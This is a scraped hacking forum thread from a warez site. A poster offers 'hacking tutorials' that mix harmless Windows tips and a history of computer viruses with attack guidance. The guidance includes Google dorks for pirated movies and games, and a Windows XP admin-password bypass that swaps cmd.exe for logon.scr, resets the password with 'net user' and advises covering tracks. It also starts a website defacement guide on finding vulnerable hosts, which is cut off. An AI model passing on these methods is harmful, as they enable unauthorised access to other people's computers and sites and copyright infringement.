hacking_secret

advertisement
LOG ME IN
vigation
nity:
cements
rk
Forums » Downloads » InWarez Hacking » Hacking- Request any tut
Latest Announcement: Changes To The Moderator Team.
Welcome to InWarez.org
Statistics
As a guest, you are restricted from accessing specific sections of the site. Registering grants you full access to a massive archive of downloads, reque
support for tech-related problems, or just chatting with other members from all over the world. Registration is fast, simple and 100% free, so please community today.
s
sts
iend
s
Online?
ads:
5,352)
& Tutorials (8,569)
19,240)
ownloads ()
(1,585)
(50,862)
30,287)
e (47,348)
on (17453)
es & Scripts (180)
tuff:
op
ming
MovieBin
UploadBud
Watch Movies
Online
WareztheGFX
Warez-Ho
Go to Page...
» Hacking- Request any tut
THREAD STATUS
USERS BROWSING
Comments: 83 / Views: 4640
Last Poster: lola13
Last Comment: Jul 29, 5:09 PM
123>>
LinkBack
Thread Tools
Search this Threa
osts
RS Account for who
n ...
zbri
omments
tes
ODLE
omments
lm should you view
Majestic
Superstar
Joined: Jun 2008
Posts: 2,989
Shared Files: 1931
Warnings: 0/0 (0)
Propz: 6264
Activity: 3%
#1 (permalink)
Posted 10-18-2008, 08:31 AM
ODLE
omments
hout Never
ODLE
omments
ool soda
ODLE
comments
any ware
Rry
comments
Megamix 2009 2 - 2CD -
s
omments
Potter And the Half
rin...
boroman
omments
1 5 [2009] ( [ Working ]
k
omments
w 7 newest activate and
Hacking Tutorials - By Majestic
This thread has been made by me so am helping out and i will regularly posting tutorials to keep this thread Alive.
I will also be filling requests, so if you want to request a tutorial on how to hack or do a specific thing i will carry out your request and try to h
I will supply all software's, usernames and passwords if needed for the tutorial
Some if these tutorials may not be easy for people who are *Novices* in hacking
Colour Code
The titles will be colour coded and will indicate which section they Belong to:
Red: Cracking
Black: Hacking
Blue: modifying ( eg. changing start button to your name
Magenta: creating files
Green: Guide
White: Searching
)
Please report any bugs in the colour code and i will fix them
Introduction: Types of Hackers
Black hat hackers:
Black Hat Hackers, who may also be known as crackers, are hackers who specialise in unauthorized penetration of information systems. They
computers to attack systems for profit, for fun, or for political motivations, as part of a social cause. Such penetration often involves modificatio
destruction of data, and is done without authorization. They also may distribute computer viruses, Internet worms, and deliver spam through th
botnets.
Grey hat hackers:
A grey hat, in the hacking community, refers to a skilled hacker who sometimes acts legally, sometimes in good will, and sometimes not. The
hybrid between white and black hat hackers. They usually do not hack for personal gain or have malicious intentions, but may or may not occa
commit crimes during the course of their technological exploits.
...
ons
omments
oft Office 2007 Home
ude...
mare
omments
oft Office 2007 Home &
mare
omments
ference Sheet
on1245
omments
rg addons for excel
nyy
omments
torials Collection
Rry
omments
hinese Brands !
benk
omments
n Wallpaper
on1245
omments
oft Malicious Software
al...
omments
for UFC 101
tion PPV ...
-Yu
omments
1 (Early Request)
cPod
White hat hackers:
White Hat Hackers, also known as Ethical Hackers, are Computer Security experts, who specialise in penetration testing, and other testin
methodologies, to ensure that a company's information systems are secure. Such people are employed by companies where these professiona
sometimes called sneakers.Groups of these people are often called tiger teams.These Security experts may utilise a variety of methods to carry
tests, including social engineering tactics, use of Hacking tools, and attempts to evade security to gain entry into secured areas.
.................................................. .................................................. ........................
Change the Defualt locations for Storing apps
As the size of hardrives increase, more people are using partitions to seperate and store groups of files.
XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the defau
installation drive and/ or directory by using a Registry hack.
Run the Registry Editor (regedit)and go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion
Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP wi
that new location as the default installation directory for new programs.
Change your dynamic ip in less then 1min
How To: Change Your Ip In Less Then 1 Minute
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked u
your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, beca
they try a little, they can trace it back
omments
men Complete 12
c Novels
s
omments
009) DVDRip XviD
arezorg
omments
ount (Game For A
)
cPod
Create One-Click Shutdown and Reboot Shortcuts:
First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizar
appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down yo
But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do e
duty, like this:
shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown com
includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.
I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I us
shutdown -s -t 03 -c "Bye Bye m8!"
shutdown -r -t 03 -c "Ill be back m8
!"
Switch
What it does
comments
st Templar (2009)
arezorg
-s
Shuts down the PC.
omments
zinerStudio Themes
eraug
-t nn
Indicates the duration of delay, in seconds, before performing the action.
omments
-l
Logs off the current user.
-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation m
-f
Forces any running applications to shut down.
-r
Reboots the PC.
[CENTER]Slipstreaming Windows XP Service Pack 1a and Create Bootable CD[/center]
Slipstreaming a Service Pack, is the process to integrate the Service Pack into the installation so that with every new installation the Operating S
and Service Pack are installed at the same time.
Slipstreaming is usually done on network shares on corporate systems. But with the advent of CD burners, it does actually make some sense for
home user or small business user to do the same.
Microsoft added the ability to Slipstream a Service Pack to Windows 2000 and Windows XP. It not only has the advantage that when you (re)in
your OS, you don't have to apply the Service Pack later, also if you update any Windows component later, you'll be sure that you get the correct
installation files if Windows needs any.
Slipstream Windows XP Service Pack 1a:
CODE
http://download.microsoft.com/downlo...p1a_en_x86.exe
Download the (full) "Network Install" of the Service Pack (English version [125 MB]), and save it to a directory (folder) on your hard drive (in
D:\XP-SP1). Other languages can be downloaded from the Windows XP Web site.
Microsoft recently released Windows XP SP1a. The only difference is that this Service Pack does no longer include Microsoft's dated Java vers
you have already installed Windows XP SP1, there is no reason to install SP1a, but the "older" SP1 (with MS Java) is no longer available for do
Next copy your Windows XP CD to your hard drive. Just create a folder (I used \XP-CD), and copy all the contents of your Windows XP CD in
folder.
Now create a folder to hold the Service Pack 1a (SP1a) files you are about to extract. I named it \XP-SP1. Next, open a Command Prompt (Star
cmd), and go to the folder where you downloaded SP1a (cd \foldername). Type the command: servicepack filename -x. A small window will ap
you need to point it to the folder where you want to extract the SP1 files. Click Ok to start extracting the SP1a files.
Once the SP1a files are extracted, change to the update folder of the SP1a files (cd update), and type the following command: update /s:path to W
CD files. In my example the command is update /s:d:\XP-CD).
Windows XP Update will do its thing:
When ready, you should get a confirmation. Windows XP Service Pack 1a has now been Slipstreamed into your original Windows XP files.
It is also possible to add the Windows XP Rollup 1 Update. For instructions, please read Adding Windows XP Rollup 1 Hotfix.
Creating a Bootable CD
For this part I used ISO Buster
CODE
Code: (Select all)
http://www.smart-projects.net/isobuster/
and Nero Burning.
Start to extract the boot loader from the original Windows XP CD. Using ISO Buster, select the "folder" Bootable CD, and right-click Microsof
Corporation.img. From the menu choose Extract Microsoft Corporation.img, and extract it to the folder on your hard drive where you have your
Windows XP files (D:\XP-CD in my case).
Next, start Nero Burning ROM, and choose CD-ROM (Boot) in the New Compilation window. On the Boot tab, select Image file under Source
image data, and browse to the location of the Microsoft Corporation.img file. Also enable Expert Settings, choosing No Emulation, and changin
Number of loaded sectors to 4 (otherwise it won't boot!)
If you have an older version of Nero you won't have the option Do Not Add ";1" ISO file version extention under Relax ISO Restrictions. You w
able to boot your new CD, so update Nero!
You can configure the Label tab to your liking, I would however recommend that you keep the Volume Label the same as on your original Win
CD.
Next press New, and drag & drop the files and folders from your Windows XP hard drive location into Nero.
Next, burn your new CD.
You now have a Bootable, Slipstreamed Windows XP Service Pack 1a CD!
Create An Ftp Server On Your Pc With Serv-u
Requirements:
Serv-U
No-IP.com Website
Quote:
Step 1. Getting a static IP address.
Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it’s easier k
up-to-date. Imagine having to change all of your setting every time your IP changed. With No-IP, the No-IP service runs in background on your
computer and updates your current IP address with your FTP server’s URL (for example, you get ftp://rkchoolie.serveftp.com). Second reas
don’t want your IP address posted out there for everyone to see.
1. Go to www.No-IP.com to create a new user account.
2. Fill in the information that is required and the click Register button.
3. Your account has now been created and your account password has been emailed to you.
4. Check your email mailbox and wait for the mail that contains your password
5. Go back to www.No-IP.com and type your email address and password to login to your account.
6. Once in your account, click on Add a host in the left menu
7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)
8. Check Allow Wildcards and click the Submit button
9. You now have your static address (example: rkchoolie.serveftp.com)
10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client
11. Once downloaded, install the software and type in your email address and password when asked.
12. Finally tick the checkbox near your static address.
You now have a static web address .
Quote:
Step 2. Installing and setting the FTP server
1. Install Serv-U 4.0.
2. Start Serv-U and use the wizard to setup your ftp.
3. Click next until you're asked for an IP address, leave it blank and then click next.
4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.
5. You are asked if you want to allow anonymous access, select No and then click next.
6. You are then asked to create a named account, check yes and then click next.
7. Type in the user name you wish for this account (example: Harrie) and click next.
8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special
characters. Then click next.
9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.
10. Select yes to lock this account to the Home directory. You want to do this so that the user can not go any further up that his home directory.
next.
11. The account is now set so click finish.
Quote:
Step 3. Configuring user accounts
1. In the left tree-menu, select the account you've just created and then click on the General tab.
2. Check Hide ‘Hidden’ Files.
3. Check Allow only and enter the number one in the box.
4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usu
mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.
5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1,
3, ADSL or cable - 5-6 users.)
6. Now, click on the Dir Access tab.
7. You should see the home folder in there. Highlight it and make your permissions.
8. If you only want users to be able to download check only Read, List, & Inherit.
9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now
highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, & Inherit. Once you have made the permission
the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.
10. If there is a folder that you don’t want anyone to have access to, but it is inside the home folder, then click the add button and then selec
folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is lo
the bottom right-hand corner. You want this no access folder to be listed at the very top.
11. There are many other different sets of permissions you can play with. I just covered your basics.
12. Your server is now set!
13. Try logging on with the username and password and see if it works.
Create a personal screen saver
This isnt a tweak, but a great little feature! For a great way to put your digital photos to work, try creating a slide show presentation for use as a
saver. Here's how:
1. Right-click an empty spot on your desktop and then click Properties.
2. Click the Screen Saver tab.
3. In the Screen saver list, click My Pictures Slideshow.
4. Click Settings to make any adjustments, such as how often the pictures should change, what size they should be, and whether you'll use trans
effects between pictures, and then click OK.
Now your screen saver is a random display of the pictures taken from your My Pictures folder.
Guide: Evolution of computer viruses and history ( Intresting
)
part 1
Like any other field in computer science, viruses have evolved -a great deal indeed- over the years. In the series of press releases which start tod
will look at the origins and evolution of malicious code since it first appeared up to the present.
Going back to the origin of viruses, it was in 1949 that Mathematician John Von Neumann described self-replicating programs which could rese
computer viruses as they are known today. However, it was not until the 60s that we find the predecessor of current viruses. In that decade, a gr
programmers developed a game called Core Wars, which could reproduce every time it was run, and even saturate the memory of other players
computers. The creators of this peculiar game also created the first antivirus, an application named Reeper, which could destroy copies created b
Wars.
However, it was only in 1983 that one of these programmers announced the existence of Core Wars, which was described the following year in
prestigious scientific magazine: this was actually the starting point of what we call computer viruses today.
At that time, a still young MS-DOS was starting to become the preeminent operating system worldwide. This was a system with great prospects
many deficiencies as well, which arose from software developments and the lack of many hardware elements known today. Even like this, this
operating system became the target of a virus in 1986: Brain, a malicious code created in Pakistan which infected boot sectors of disks so that th
contents could not be accessed. That year also saw the birth of the first Trojan: an application called PC-Write.
Shortly after, virus writers realized that infecting files could be even more harmful to systems. In 1987, a virus called Suriv-02 appeared, which
COM files and opened the door to the infamous viruses Jerusalem or Viernes 13. However, the worst was still to come: 1988 set the date when
“Morris worm― appeared, infecting 6,000 computers.
From that date up to 1995 the types of malicious codes that are known today started being developed: the first macro viruses appeared, polymor
viruses … Some of these even triggered epidemics, such as MichaelAngelo. However, there was an event that changed the virus scenario world
the massive use of the Internet and e-mail. Little by little, viruses started adapting to this new situation until the appearance, in 1999, of Melissa
malicious code to cause a worldwide epidemic, opening a new era for computer viruses.
part 2
This second installment of ‘The evolution of viruses’ will look at how malicious code used to spread before use of the Internet and e-mai
as commonplace as it is today, and the main objectives of the creators of those earlier viruses.
Until the worldwide web and e-mail were adopted as a standard means of communication the world over, the main mediums through which viru
spread were floppy disks, removable drives, CDs, etc., containing files that were already infected or with the virus code in an executable boot se
When a virus entered a system it could go memory resident, infecting other files as they were opened, or it could start to reproduce immediately
infecting other files on the system. The virus code could also be triggered by a certain event, for example when the system clock reached a certa
or time. In this case, the virus creator would calculate the time necessary for the virus to spread and then set a date –often with some particula
significance- for the virus to activate. In this way, the virus would have an incubation period during which it didn’t visibly affect computers
spread from one system to another waiting for ‘D-day’ to launch its payload. This incubation period would be vital to the virus successfu
infecting as many computers as possible.
One classic example of a destructive virus that lay low before releasing its payload was CIH, also known as Chernobyl. The most damaging ver
this malicious code activated on April 26, when it would try to overwrite the flash-BIOS, the memory which includes the code needed to contro
devices. This virus, which first appeared in June 1998, had a serious impact for over two years and still continues to infect computers today.
Because of the way in which they propagate, these viruses spread very slowly, especially in comparison to the speed of today’s malicious co
Towards the end of the Eighties, for example, the Friday 13th (or Jerusalem) virus needed a long time to actually spread and continued to infect
computers for some years. In contrast, experts reckon that in January 2003, SQLSlammer took just ten minutes to cause global communication
across the Internet.
Notoriety versus stealth
For the most part, in the past, the activation of a malicious code triggered a series of on screen messages or images, or caused sounds to be emit
catch the user’s attention. Such was the case with the Ping Pong virus, which displayed a ball bouncing from one side of the screen to anoth
kind of elaborate display was used by the creator of the virus to gain as much notoriety as possible. Nowadays however, the opposite is the norm
virus authors trying to make malicious code as discreet as possible, infecting users’ systems without them noticing that anything is amiss.
pat 3
This third installment of ‘The evolution of viruses’ will look at how the Internet and e-mail changed the propagation techniques used by c
viruses.
Internet and e-mail revolutionized communications. However, as expected, virus creators didn’t take long to realize that along with this new
of communication, an excellent way of spreading their creations far and wide had also dawned. Therefore, they quickly changed their aim from
a few computers while drawing as much attention to themselves as possible, to damaging as many computers as possible, as quickly as possible
change in strategy resulted in the first global virus epidemic, which was caused by the Melissa worm.
With the appearance of Melissa, the economic impact of a virus started to become an issue. As a result, users -above all companies- started to b
seriously concerned about the consequences of viruses on the security of their computers. This is how users discovered antivirus programs, whi
to be installed widely. However, this also brought about a new challenge for virus writers, how to slip past this protection and how to persuade u
run infected files.
The answer to which of these virus strategies was the most effective came in the form of a new worm: Love Letter, which used a simple but effe
ruse that could be considered an early type of social engineering. This strategy involves inserting false messages that trick users into thinking th
message includes anything, except a virus. This worm’s bait was simple; it led users to believe that they had received a love letter.
This technique is still the most widely used. However, it is closely followed by another tactic that has been the center of attention lately: exploit
vulnerabilities in commonly used software. This strategy offers a range of possibilities depending on the security hole exploited. The first malic
code to use this method –and quite successfully- were the BubbleBoy and Kakworm worms. These worms exploited a vulnerability in Interne
Explorer by inserting HTML code in the body of the e-mail message, which allowed them to run automatically, without needing the user to do a
Vulnerabilities allow many different types of actions to be carried out. For example, they allow viruses to be dropped on computers directly from
Internet -such as the Blaster worm-. In fact, the effects of the virus depend on the vulnerability that the virus author tries to exploit.
part 4
In the early days of computers, there were relatively few PCs likely to contain “sensitive― information, such as credit card numbers or oth
financial data, and these were generally limited to large companies that had already incorporated computers into working processes.
In any event, information stored in computers was not likely to be compromised, unless the computer was connected to a network through whic
information could be transmitted. Of course, there were exceptions to this and there were cases in which hackers perpetrated frauds using data s
IT systems. However, this was achieved through typical hacking activities, with no viruses involved.
The advent of the Internet however caused virus creators to change their objectives, and, from that moment on, they tried to infect as many com
possible in the shortest time. Also, the introduction of Internet services -like e-banking or online shopping- brought in another change. Some vir
creators started writing malicious codes not to infect computers, but, to steal confidential data associated to those services. Evidently, to achieve
they needed viruses that could infect many computers silently.
Their malicious labor was finally rewarded with the appearance, in 1986, of a new breed of malicious code generically called “Trojan Horse
simply “Trojan―. This first Trojan was called PC-Write and tried to pass itself off as the shareware version of a text processor. When run,
Trojan displayed a functional text processor on screen. The problem was that, while the user wrote, PC-Write deleted and corrupted files on the
computers’ hard disk.
After PC-Write, this type of malicious code evolved very quickly to reach the stage of present-day Trojans. Today, many of the people who des
Trojans to steal data cannot be considered virus writers but simply thieves who, instead of using blowtorches or dynamite have turned to viruses
commit their crimes. Ldpinch.W or the Bancos or Tolger families of Trojans are examples of this
part 5
Even though none of them can be left aside, some particular fields of computer science have played a more determinant role than others with re
the evolution of viruses. One of the most influential fields has been the development of programming languages.
These languages are basically a means of communication with computers in order to tell them what to do. Even though each of them has its own
development and formulation rules, computers in fact understand only one language called "machine code".
Programming languages act as an interpreter between the programmer and the computer. Obviously, the more directly you can communicate wi
computer, the better it will understand you, and more complex actions you can ask it to perform.
According to this, programming languages can be divided into "low and high level" languages, depending on whether their syntax is more
understandable for programmers or for computers. A "high level" language uses expressions that are easily understandable for most programme
not so much for computers. Visual Basic and C are good examples of this type of language.
On the contrary, expressions used by "low level" languages are closer to machine code, but are very difficult to understand for someone who ha
been involved in the programming process. One of the most powerful, most widely used examples of this type of language is "assembler".
In order to explain the use of programming languages through virus history, it is necessary to refer to hardware evolution. It is not difficult to un
that an old 8-bit processor does not have the power of modern 64-bit processors, and this of course, has had an impact on the programming lang
used.
In this and the next installments of this series, we will look at the different programming languages used by virus creators through computer his
- Virus antecessors: Core Wars
As was already explained in the first chapter of this series, a group of programs called Core Wars, developed by engineers at an important
telecommunications company, are considered the antecessors of current-day viruses. Computer science was still in the early stages and program
languages had hardly developed. For this reason, authors of these proto-viruses used a language that was almost equal to machine code to progr
Curiously enough, it seems that one of the Core Wars programmers was Robert Thomas Morris, whose son programmed -years later- the "Morr
worm". This malicious code became extraordinarily famous since it managed to infect 6,000 computers, an impressive figure for 1988.
- The new gurus of the 8-bits and the assembler language.
The names Altair, IMSAI and Apple in USA and Sinclair, Atari and Commodore in Europe, bring memories of times gone by, when a new gene
computer enthusiasts "fought" to establish their place in the programming world. To be the best, programmers needed to have profound knowle
machine code and assembler, as interpreters of high-level languages used too much run time. BASIC, for example, was a relatively easy to learn
language which allowed users to develop programs simply and quickly. It had however, many limitations.
This caused the appearance of two groups of programmers: those who used assembler and those who turned to high-level languages (BASIC an
PASCAL, mainly).
Computer aficionados of the time enjoyed themselves more by programming useful software than malware. However, 1981 saw the birth of wh
considered the first 8-bit virus. Its name was "Elk Cloner", and was programmed in machine code. This virus could infect Apple II systems and
displayed a message when it infected a computer.
part 6
Computer viruses evolve in much the same way as in other areas of IT. Two of the most important factors in understanding how viruses have re
their current level are the development of programming languages and the appearance of increasingly powerful hardware.
In 1981, almost at the same time as Elk Kloner (the first virus for 8-bit processors) made its appearance, a new operating system was growing in
popularity. Its full name was Microsoft Disk Operating System, although computer buffs throughout the world would soon refer to it simply as
DOS viruses
The development of MS DOS systems occurred in parallel to the appearance of new, more powerful hardware. Personal computers were gradua
establishing themselves as tools that people could use in their everyday lives, and the result was that the number of PCs users grew substantially
Perhaps inevitably, more users also started creating viruses. Gradually, we witnessed the appearance of the first viruses and Trojans for DOS, w
assembler language and demonstrating a degree of skill on the part of their authors.
Far less programmers know assembler language than are familiar with high-level languages that are far easier to learn. Malicious code written in
Fortran, Basic, Cobol, C or Pascal soon began to appear. The last two languages, which are well established and very powerful, are the most wid
used, particularly in their TurboC and Turbo Pascal versions. This ultimately led to the appearance of “virus families―: that is, viruses tha
followed by a vast number of related viruses which are slightly modified forms of the original code.
Other users took the less ‘artistic’ approach of creating destructive viruses that did not require any great knowledge of programming. As a
batch processing file viruses or BAT viruses began to appear.
Win16 viruses
The development of 16-bit processors led to a new era in computing. The first consequence was the birth of Windows, which, at the time, was j
application to make it easier to handle DOS using a graphic interface.
The structure of Windows 3.xx files is rather difficult to understand, and the assembler language code is very complicated, as a result of which
programmers initially attempted to develop viruses for this platform. But this problem was soon solved thanks to the development of programm
for high-level languages, above all Visual Basic. This application is so effective that many virus creators adopted it as their ‘daily working to
This meant that writing a virus had become a very straightforward task, and viruses soon appeared in their hundreds. This development was
accompanied by the appearance of the first Trojans able to steal passwords. As a result, more than 500 variants of the AOL Trojan family -desig
steal personal information from infected computers- were identified.
part 7
This seventh edition on the history of computer viruses will look at how the development of Windows and Visual Basic has influenced the evol
viruses, as with the development of these, worldwide epidemics also evolved such as the first one caused by Melissa in 1999.
While Windows changed from being an application designed to make DOS easier to manage to a 32-bit platform and operating system in its ow
virus creators went back to using assembler as the main language for programming viruses.
Versions 5 and 6 of Visual Basic (VB) were developed, making it the preferred tool, along with Borland Delphi (the Pascal development for the
Windows environment), for Trojan and worm writers. Then, Visual C, a powerful environment developed in C for Windows, was adopted for c
viruses, Trojans and worms. This last type of malware gained unusual strength, taking over almost all other types of viruses. Even though the
characteristics of worms have changed over time, they all have the same objective: to spread to as many computers as possible, as quickly as po
With time, Visual Basic became extremely popular and Microsoft implemented part of the functionality of this language as an interpreter capab
running script files with a similar syntax.
At the same time as the Win32 platform was implemented, the first script viruses also appeared: malware inside a simple text file. These demon
that not only executable files (.EXE and .COM files) could carry viruses. As already seen with BAT viruses, there are also other means of propa
proving the saying "anything that can be executed directly or through a interpreter can contain malware." To be specific, the first viruses that in
the macros included in Microsoft Office emerged. As a result, Word, Excel, Access and PowerPoint become ways of spreading ‘lethal weapo
which destroyed information when the user simply opened a document.
Melissa and self-executing worms
The powerful script interpreters in Microsoft Office allowed virus authors to arm their creations with the characteristics of worms. A clear exam
Melissa, a Word macro virus with the characteristics of a worm that infects Word 97 and 2000 documents. This worm automatically sends itself
an attachment to an e-mail message to the first 50 contacts in the Outlook address book on the affected computer. This technique, which has
unfortunately become very popular nowadays, was first used in this virus which, in 1999, caused one of the largest epidemics in computer histo
a few days. In fact, companies like Microsoft, Intel or Lucent Technologies had to block their connections to the Internet due to the actions of M
The technique started by Melissa was developed in 1999 by viruses like VBS/Freelink, which unlike its predecessor sent itself out to all the con
the address book on the infected PC. This started a new wave of worms capable of sending themselves out to all the contacts in the Outlook add
book on the infected computer. Of these, the worm that most stands out from the rest is VBS/LoveLetter, more commonly known as ‘I love Y
which emerged in May 2000 and caused an epidemic that caused damage estimated at 10,000 million euros. In order to get the user’s attenti
help it to spread, this worm sent itself out in an e-mail message with the subject ‘ILOVEYOU’ and an attached file called ‘LOVE-LET
FOR-YOU.TXT.VBS’. When the user opened this attachment, the computer was infected.
As well as Melissa, in 1999 another type of virus emerged that also marked a milestone in virus history. In November of that year, VBS/Bubble
appeared, a new type of Internet worm written in VB Script. VBS/BubbleBoy was automatically run without the user needing to click on an atta
file, as it exploited a vulnerability in Internet Explorer 5 to automatically run when the message was opened or viewed. This worm was followed
by JS/Kak.Worm, which spread by hiding behind Java Script in the auto-signature in Microsoft Outlook Express, allowing it to infect computer
the user needing to run an attached file. These were the first samples of a series of worms, which were joined later on by worms capable of attac
computers when the user is browsing the Internet.
Geting movies, mp3 and games using google
okay lets keep this tutorial short. you want movies and games/mp3 / games and dont' know where to get them, thank god there is google.com
goto www.google.com
put this string in
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
notice that iam only changing the word after the parent directory, change it to what you want and you will get lots of goods. i got plenty of mov
heh.
How to hack Windows XP Admin Passwords the easy way
-----------------------------------------------------------------------------This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.
This has worked for me on both Windows XP Home and Pro.
----------------------------------------------------------------------------Now this one seems to be machine dependant, it works randomly(don't know why)
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
----------------------------------------------------------------------------cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
----------------------------------------------------------------------------Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
How To Speed Up A Slow Computer
first off in the bottom right hand corner of your computer if you see alot of icons start up there when you first start your computer then this is fo
you dont know already how to get rid of em.
Press your Start Button (bottom left) and go to "run"
now type in: msconfig
now you will get a box that pops up and will tell you bunch of stuff dont mess with anything else other than what I tell you otherwise you could
something really bad (possible) go to your "startup" tab on the top right of the screen where it usually is and click it.
Now you will have a closed in box with bunch of filenames n addresses and more boxes with checks in them. Now if your like me you dont wa
anything startin up when you start you computer up or while your even doing anything cause it slows you down. Now unless your like me right
have 1 thing starting up when my computer starts up and thats my settin for my overclocked vid card. But other than that uncheck every box and
apply and ok. Then window you were jus in will now close and ask you if you want to restart or wait till later to restart.
Either way when you shut it off and then turn it back on the settins will kick in
Install Xp From Dos
If XP will not install from the CD or if you have a new drive with no operating system on
it yet try these:
Install Windows XP from the hard drive with Windows 98 already installed:
Boot Windows 98
Insert the XP CD into your CD reader
Explore Windows XP through My Computer
Copy i386 folder to C:\
Go into C:\i386 folder and double click on winnt32.exe to launch the setup from the hard drive
Install Windows XP from DOS (ie. no OS on a new hard drive):
Boot with a Windows 98 Start Up disk
Insert the Windows 98 CD into the CD reader
Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching)
Type cd.. to back up to the root directory
Insert Windows XP CD into the CD reader
Copy the i386 folder to C:\
Go into C:\i386 folder on C: and type winnt.exe to launch the setup from the hard drive.
Steps To Deface A Webpage (About Defacers)
Added for Pharoh
First of all, I do not deface, I never have (besides friends sites as jokes and all in good fun), and never will. So how do I know how to deface? I
just picked it up on the way, so I am no expert in this. If I get a thing or two wrong I apoligize. It is pretty simple when you think that defacing i
replacing a file on a computer. Now, finding the exploit in the first place, that takes skill, that takes knowledge, that is what real hackers are ma
don't encourage that you deface any sites, as this can be used get credit cards, get passwords, get source code, billing info, email databases, etc..
only right to put up some kind of warning. now go have fun
This tutorial will be broken down into 3 main sections, they are as followed:
1. Finding Vuln Hosts.
2. Getting In.
3. Covering Your Tracks
It really is easy, and I will show you how easy it is.
1. Finding Vuln Hosts
This section needs to be further broken down into two catigories of script kiddies: ones who scan the net for a host that is vuln to a certain explo
ones who search a certain site for any exploit. The ones you see on alldas are the first kind, they scan thousands of sites for a specific exploit. Th
not care who they hack, anyone will do. They have no set target and not much of a purpose. In my opinion these people should either have a cau
behind what they are doing, ie. "I make sure people keep up to date with security, I am a messanger" or "I am spreading a political message, I us
defacments to get media attention". People who deface to get famous or to show off their skills need to grow up and relize there is a better way
about this (not that I support the ones with other reasons ether). Anyways, the two kinds and what you need to know about them:
Scanning Script Kiddie: You need to know what signs of the hole are, is it a service? A certain OS? A CGI file? How can you tell if they are vu
version(s) are vuln? You need to know how to search the net to find targets which are running whatever is vuln. Use altavista.com or google.com
web based exploits. Using a script to scan ip ranges for a certain port that runs the vuln service. Or using netcraft.com to find out what kind of s
they are running and what extras it runs (frontpage, php, etc..) nmap and other port scanners allow quick scans of thousands of ips for open port
a favorate technique of those guys you see with mass hacks on alldas.
Targetted Site Script Kiddie: More respectable then the script kiddies who hack any old site. The main step here is gathering as much informatio
a site as possible. Find out what OS they run at netcraft or by using: telnet www.site.com 80 then GET / HTTP/1.1 Find out what services they r
